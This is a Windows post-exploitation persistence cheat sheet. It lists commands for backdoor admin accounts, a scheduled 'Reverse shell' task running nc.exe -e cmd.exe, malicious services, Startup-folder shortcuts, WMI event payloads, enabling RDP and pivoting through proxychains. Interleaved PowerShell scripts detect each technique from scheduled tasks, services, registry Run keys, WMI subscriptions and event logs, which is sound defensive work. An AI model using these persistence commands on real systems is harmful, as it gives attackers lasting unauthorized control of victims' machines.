Post Exploitation - Persistence.md


Create User:

Create user (CMD): net user username password /add
Add user to group (CMD): net localgroup Administrators username /add
Add user to group (Powershell): Add-LocalGroupMember -Group Administrators -Member username

Scheduled Tasks:

Local scheduled task: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads\nc.exe -e cmd.exe'
Create remote scheduled task: schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password
Logon Scripts: schtasks /create /sc onlogon /tn "task-name" /tr "File or App PATH" /RU "username"
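Defensive counterpart to the three schtasks one-liners above (added example, not part of the original notes): audit existing tasks for the same patterns (a repeating interval of a few minutes, a logon trigger, or an action launched from a user-writable path such as Downloads) and list recent task creations from the Security log. The path hints, the 5-minute threshold and the 7-day lookback are assumptions; event 4698 is only written when "Audit Other Object Access Events" is enabled.

```powershell
# Added example (not from the original notes). Path hints and thresholds are assumptions.
$UserWritableHints = @('\Users\', '\Temp\', '\AppData\', '\ProgramData\', '\Downloads\')

function Find-SuspiciousScheduledTask {
    param([switch]$IncludeMicrosoft)   # built-in \Microsoft\ tasks are skipped unless asked for
    foreach ($task in Get-ScheduledTask) {
        if (-not $IncludeMicrosoft -and $task.TaskPath -like '\Microsoft\*') { continue }
        $triggerKinds = @($task.Triggers | ForEach-Object { $_.CimClass.CimClassName })
        # Shortest repetition interval across all triggers; "/sc minute /mo 1" yields PT1M.
        $shortest = $task.Triggers |
            Where-Object { $_.Repetition -and $_.Repetition.Interval } |
            ForEach-Object { [System.Xml.XmlConvert]::ToTimeSpan($_.Repetition.Interval) } |
            Sort-Object | Select-Object -First 1
        $rapid = $shortest -and $shortest -le [TimeSpan]::FromMinutes(5)
        $logon = $triggerKinds -contains 'MSFT_TaskLogonTrigger'   # "/sc onlogon"
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions carry no Execute
            $cmd = ('{0} {1}' -f $action.Execute, $action.Arguments).Trim()
            $fromUserPath = [bool]($UserWritableHints | Where-Object { $cmd -like "*$_*" })
            if ($fromUserPath -or $rapid -or $logon) {
                [PSCustomObject]@{
                    TaskPath     = $task.TaskPath
                    TaskName     = $task.TaskName
                    Author       = $task.Author
                    RunAs        = $task.Principal.UserId
                    Triggers     = ($triggerKinds -join ', ')
                    MinInterval  = $shortest
                    Command      = $cmd
                    State        = $task.State
                }
            }
        }
    }
}

function Get-RecentTaskCreation {
    param([int]$Days = 7)
    # Event 4698 "A scheduled task was created". Property order: SubjectUserSid,
    # SubjectUserName, SubjectDomainName, SubjectLogonId, TaskName, TaskContent (task XML).
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml = [xml]$_.Properties[5].Value
            [PSCustomObject]@{
                Time     = $_.TimeCreated
                Creator  = '{0}\{1}' -f $_.Properties[2].Value, $_.Properties[1].Value
                TaskName = $_.Properties[4].Value
                Command  = ("$($xml.Task.Actions.Exec.Command) $($xml.Task.Actions.Exec.Arguments)").Trim()
            }
        }
}

Find-SuspiciousScheduledTask | Format-Table -AutoSize
Get-RecentTaskCreation -Days 7 | Format-Table -AutoSize
```

Run it elevated to see tasks registered by other accounts; the "Reverse shell" task from the note above shows up with MinInterval 00:01:00 and a Command under \Users\.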

Create Service:

sc create (service name) binpath= "cmd.exe /k C:\temp\pentestlab.exe" start= auto obj= LocalSystem
sc start (service name)

Startup Folder:

Add files/executables/links to user startup folder: C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rev.lnk
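Defensive counterpart to the Startup-folder entry (added example, not part of the original notes), covering the registry Run keys referenced further down as well: enumerate the per-user and all-users Startup folders and the Run/RunOnce values, resolving .lnk shortcuts to the executable they actually launch so an entry like rev.lnk is not hidden behind its shortcut name. Folder and key locations are the standard ones; the output shape is my own.

```powershell
# Added example (not from the original notes): list autostart entries from the
# Startup folders and the Run/RunOnce keys, resolving shortcut targets.
function Get-AutostartEntry {
    $shell = New-Object -ComObject WScript.Shell
    $folders = @(
        "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",        # current user
        "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"     # all users
    )
    foreach ($folder in $folders) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        foreach ($item in Get-ChildItem -LiteralPath $folder -File -Force) {
            $target = $item.FullName
            $arguments = ''
            if ($item.Extension -eq '.lnk') {
                # Read the shortcut instead of trusting its file name
                $lnk = $shell.CreateShortcut($item.FullName)
                $target = $lnk.TargetPath
                $arguments = $lnk.Arguments
            }
            [PSCustomObject]@{
                Source   = 'StartupFolder'
                Location = $item.FullName
                Name     = $item.Name
                Command  = ("$target $arguments").Trim()
                Created  = $item.CreationTime
            }
        }
    }

    # Registry Run keys (add the WOW6432Node variants on 64-bit hosts if needed)
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    $providerProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
    foreach ($key in $runKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $values = Get-ItemProperty -LiteralPath $key
        foreach ($p in $values.PSObject.Properties) {
            if ($providerProps -contains $p.Name) { continue }   # skip provider metadata
            [PSCustomObject]@{
                Source   = 'RunKey'
                Location = $key
                Name     = $p.Name
                Command  = [string]$p.Value
                Created  = $null   # the registry does not expose a per-value creation time
            }
        }
    }
}

Get-AutostartEntry | Format-Table -AutoSize
```

Compare the Command column against what the machine is supposed to run at logon; anything pointing into AppData, Temp or Downloads deserves a closer look.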

Abandoned processes:

Try to find processes with procmon.exe whose status is NOT_FOUND.
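Defensive counterpart to the "Create Service" and "Abandoned processes" entries above (added example, not part of the original notes): audit installed services for an image path that wraps an interpreter (cmd.exe /k, powershell, rundll32), that lives outside the Windows or Program Files trees, or whose binary no longer exists on disk (the NOT_FOUND case, an abandoned entry that could be filled in), and list recent installs from the System log (event 7045). The interpreter list and the trusted path list are assumptions.

```powershell
# Added example (not from the original notes). Interpreter and trusted-path lists are assumptions.
function Get-ServiceImage {
    param([string]$PathName)
    # Handles both "C:\dir with space\svc.exe" -arg and C:\plain\svc.exe -arg: the first
    # ".exe" token is the image. Paths without .exe fall back to the first token.
    if ($PathName -match '^\s*"?(?<img>[^"]+?\.exe)') { return $Matches.img }
    return ($PathName -split '\s+')[0].Trim('"')
}

function Find-SuspiciousService {
    $trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $image = Get-ServiceImage -PathName $svc.PathName
        $reasons = @()
        if ($svc.PathName -match '(?i)\b(cmd|powershell|pwsh|rundll32|mshta|wscript|cscript)\.exe') {
            $reasons += 'interpreter'
        }
        if (-not ($trusted | Where-Object { $image -like "$_*" })) { $reasons += 'untrusted-path' }
        # Unexpanded %SystemRoot% style paths will also show as missing; check those by hand
        if ($image -and -not (Test-Path -LiteralPath $image)) { $reasons += 'image-missing' }
        if ($reasons) {
            [PSCustomObject]@{
                Name      = $svc.Name
                StartMode = $svc.StartMode
                RunAs     = $svc.StartName
                Image     = $image
                PathName  = $svc.PathName
                Reasons   = ($reasons -join ',')
            }
        }
    }
}

function Get-RecentServiceInstall {
    param([int]$Days = 7)
    # 7045 (Service Control Manager) "A service was installed in the system".
    # Property order: ServiceName, ImagePath, ServiceType, StartType, AccountName.
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [PSCustomObject]@{
                Time      = $_.TimeCreated
                Service   = $_.Properties[0].Value
                ImagePath = $_.Properties[1].Value
                StartType = $_.Properties[3].Value
                Account   = $_.Properties[4].Value
            }
        }
}

Find-SuspiciousService | Format-Table -AutoSize
Get-RecentServiceInstall -Days 7 | Format-Table -AutoSize
```

The sc create line above would surface with Reasons "interpreter,untrusted-path" (cmd.exe /k, C:\temp) and a matching 7045 entry with StartType "auto start" and Account LocalSystem.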

WMI Event:

Execute your payload when another program runs or an event happens. Can be done with PowerLurk.
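Defensive counterpart to the WMI event entry (added example, not part of the original notes): enumerate permanent WMI event subscriptions in root\subscription by joining each __FilterToConsumerBinding to its __EventFilter (the trigger query) and __EventConsumer (what runs), and flag consumer types that execute code. The reference-to-name parsing covers both the CimInstance and the string form of the Filter/Consumer properties; everything else uses the standard class and property names.

```powershell
# Added example (not from the original notes): list WMI permanent event subscriptions.
function Get-WmiSubscription {
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
    $codeConsumers = @('CommandLineEventConsumer', 'ActiveScriptEventConsumer')

    foreach ($b in $bindings) {
        # Filter/Consumer are object references; pull the Name key out of either
        # '__EventFilter (Name = "x")' (CimInstance) or '__EventFilter.Name="x"' (string).
        $fName = if ([string]$b.Filter   -match 'Name\s*=\s*"(?<n>[^"]+)"') { $Matches.n } else { [string]$b.Filter }
        $cName = if ([string]$b.Consumer -match 'Name\s*=\s*"(?<n>[^"]+)"') { $Matches.n } else { [string]$b.Consumer }
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1
        $cType = $c.CimClass.CimClassName
        $payload = switch ($cType) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($c.ScriptFileName) { $c.ScriptFileName } else { $c.ScriptText } }
            default                     { '' }
        }
        [PSCustomObject]@{
            Filter       = $fName
            Query        = $f.Query              # e.g. __InstanceCreationEvent on Win32_Process
            Consumer     = $cName
            ConsumerType = $cType
            RunsCode     = ($codeConsumers -contains $cType)
            Payload      = $payload
        }
    }
}

Get-WmiSubscription | Format-List
```

Anything with RunsCode True that an admin did not deliberately register is worth investigating; a filter on __InstanceCreationEvent / Win32_Process paired with a CommandLineEventConsumer is the shape a "run my payload when program X starts" subscription takes.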

Additional Information:

Windows Tasks:

  1. https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/
  2. https://dmfrsecurity.com/2021/09/07/scheduled-task-persistence/

Windows Registry:

  1. https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/

Services:

  1. https://pentestlab.blog/2019/10/07/persistence-new-service/
  2. https://dmcxblue.gitbook.io/red-team-notes/persistence/new-service

Startup Folder:

  1. https://dmcxblue.gitbook.io/red-team-notes/persistence/registry-keys-startup-folder
  2. https://stmxcsr.com/persistence/looking-at-the-startup-directory.html

WMI Event:

  1. https://github.com/Sw4mpf0x/PowerLurk

ENABLE RDP:

POWERSHELL:
Enable-PSRemoting
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

CMD:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

METERPRETER:
run getgui -u username -p password

ADD NEW USER TO RDP & ADMIN GROUP (POWERSHELL / CMD):

  1. net user username password /add
  2. net localgroup "Remote Desktop Users" domain\username /add
  3. net localgroup Administrators domain\username /add
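Defensive counterpart to the "Create User", "ENABLE RDP" and "ADD NEW USER TO RDP & ADMIN GROUP" entries (added example, not part of the original notes): report the host's current RDP exposure (fDenyTSConnections, the "Remote Desktop" firewall rule group, Remote Desktop Users and Administrators membership) and pull account-creation and group-membership events from the Security log. Event IDs and property positions are the standard Windows ones; the 7-day lookback is an assumption.

```powershell
# Added example (not from the original notes). Lookback window is an assumption.
function Get-RdpExposure {
    $reg   = Get-ItemProperty -LiteralPath 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -ErrorAction SilentlyContinue
    $rules = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue)
    [PSCustomObject]@{
        RdpAllowed     = ($reg.fDenyTSConnections -eq 0)          # 0 = connections allowed
        EnabledFwRules = @($rules | Where-Object { $_.Enabled -eq 'True' }).Count
        TotalFwRules   = $rules.Count
        RdpUsers       = @(Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue | ForEach-Object Name)
        LocalAdmins    = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue | ForEach-Object Name)
    }
}

function Get-AccountChangeEvent {
    param([int]$Days = 7)
    # 4720 user created; 4732/4728/4756 member added to a local/global/universal group.
    # 4720 properties: TargetUserName(0) ... SubjectUserName(4), SubjectDomainName(5).
    # Group events: MemberName(0), MemberSid(1), TargetUserName(2) = group,
    #               SubjectUserName(6), SubjectDomainName(7).
    $kinds = @{ 4720 = 'UserCreated'; 4732 = 'AddedToLocalGroup'; 4728 = 'AddedToGlobalGroup'; 4756 = 'AddedToUniversalGroup' }
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = @($kinds.Keys); StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $p = $_.Properties
            if ($_.Id -eq 4720) {
                $target = $p[0].Value
                $group  = ''
                $actor  = '{0}\{1}' -f $p[5].Value, $p[4].Value
            } else {
                # MemberName is '-' when only the SID is known
                $target = if ($p[0].Value -ne '-') { $p[0].Value } else { $p[1].Value }
                $group  = $p[2].Value
                $actor  = '{0}\{1}' -f $p[7].Value, $p[6].Value
            }
            [PSCustomObject]@{
                Time   = $_.TimeCreated
                Event  = $kinds[[int]$_.Id]
                Target = $target
                Group  = $group
                Actor  = $actor
            }
        }
}

Get-RdpExposure | Format-List
Get-AccountChangeEvent -Days 7 | Format-Table -AutoSize
```

The three net commands above produce a 4720 followed by two 4732 entries (groups "Remote Desktop Users" and "Administrators") within seconds of each other, all with the same Actor; that sequence is a useful alert condition on hosts where accounts are not normally created locally.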

LOGIN TO INTERNAL HOST USING RDP VIA PROXYCHAINS:
proxychains4 xfreerdp /d:DOMAIN /u:username /p:password /v:host_ip